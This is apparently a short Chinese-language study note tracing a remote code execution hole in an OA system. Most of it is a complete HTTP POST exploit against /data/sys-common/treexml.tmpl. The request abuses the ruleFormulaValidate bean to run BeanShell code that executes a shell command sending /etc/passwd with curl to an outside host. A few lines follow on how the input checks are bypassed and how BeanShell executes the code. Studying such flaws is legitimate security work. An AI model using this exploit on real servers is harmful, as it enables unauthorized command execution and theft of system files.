开始
从群里看到师傅发的oa的漏洞,跟着源码跟踪学习下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| POST /data/sys-common/treexml.tmpl HTTP/1.1
Host: xxxxx:8443
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 448
s_bean=ruleFormulaValidate&script=try {
String[] cc= { "/bin/sh", "-c", "curl -X POST -d '@/etc/passwd' http://x.x.x.x:8888/111" };
Process child = Runtime.getRuntime().exec(cc);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
|
在找之前一定要把lib添加到目录里面去
跟踪到下面,然后找 IXMLDataBean
看看哪些实现了这个接口
继续往下
校验字符串
判断去结尾去特殊字符和空格。然后判断是否存在$,如果存在就重复去除$
之后再动态拼接
bsh(BeanShell)动态执行java代码
